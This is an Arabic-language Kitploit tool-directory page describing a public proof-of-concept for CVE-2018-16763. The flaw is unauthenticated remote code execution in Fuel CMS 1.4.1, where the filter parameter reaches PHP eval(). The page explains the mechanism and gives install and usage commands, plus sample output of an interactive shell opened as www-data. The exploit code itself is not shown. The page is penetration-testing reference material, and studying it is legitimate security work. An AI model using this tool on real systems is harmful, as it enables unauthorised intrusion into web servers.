Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC — ثغرة RCE غير مصادق عليها في Fuel CMS 1.4.1. | Kitploit
أدوات/GitHubGitHub/estebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubestebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc

CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC

ثغرة RCE غير مصادق عليها في Fuel CMS 1.4.1.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

CVE-2018-16763 — Fuel CMS 1.4.1 تنفيذ تعليمات برمجية عن بعد (PoC)

ثغرة تنفيذ تعليمات برمجية عن بعد بدون مصادقة في Fuel CMS 1.4.1. يتم تمرير المعامل filter في نقطة النهاية /fuel/pages/select/ دون تنقية إلى استدعاء eval() في واجهة PHP الخلفية، مما يسمح بتنفيذ تعليمات برمجية عشوائية عبر حمولة مصممة. على عكس الحقن الأعمى، يتم عكس المخرجات مباشرة في استجابة HTTP، لذا ليست هناك حاجة لملف وسيط.


كيف يعمل

  1. يرسل طلب GET إلى /fuel/pages/select/ مع حمولة filter مصممة خصيصًا تستدعي system() الخاصة بـ PHP مع الأمر المطلوب.
  2. يحلل المخرجات المنعكسة من استجابة HTTP باستخدام نمط regex.
  3. يعيد مخرجات الأمر مباشرة إلى الصدفة التفاعلية.

المتطلبات

  • Python 3
  • تثبيت التبعيات:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

الاستخدام

root@kitploit:~
python3 exploit.py -t http://TARGET

مثال:

root@kitploit:~
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit

المراجع

  • CVE-2018-16763
  • EDB-47138

الإسناد

  • الاكتشاف والاستغلال الأصلي: Syed Sheeraz Ali
  • التنظيف والصدفة التفاعلية: Esteban Zárate
تنزيل الأداة